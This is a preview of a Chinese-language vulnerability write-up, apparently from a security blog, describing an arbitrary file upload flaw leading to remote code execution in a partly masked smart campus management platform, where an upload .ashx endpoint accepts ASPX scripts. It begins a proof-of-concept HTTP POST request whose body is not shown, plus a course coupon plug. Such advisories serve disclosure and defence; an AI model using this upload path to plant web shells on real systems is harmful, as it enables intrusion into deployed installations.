漏洞分析 | 某智慧管理平台RCE漏洞

文章预览

01 阅读须知 文末优惠券剩余数量不多，有需要的师傅冲吧！ 02 漏洞背景 某 通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的系统。无需安装，只需在后台配置即可在浏览器登录。 功能包括：系统管理中心、人员信息管理中心、设备管理中心、水控管理子系统、电控管理子系统、考勤管理子系统、会议签到管理子系统、访客管理子系统。 该系统的Upload**. a shx 接口存在任意文件上传漏洞 。 03 漏洞复现 近日外部公开渠道爆出该系统存在RCE漏洞，参数my***没有判断文件扩展名，可以上传任意ASPX脚本 ，具体的数据包如下所示。 POST /UpLoad**.ashx HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Content-Length: 431 Accept: */* Accept-Encoding: gzip, ………………………………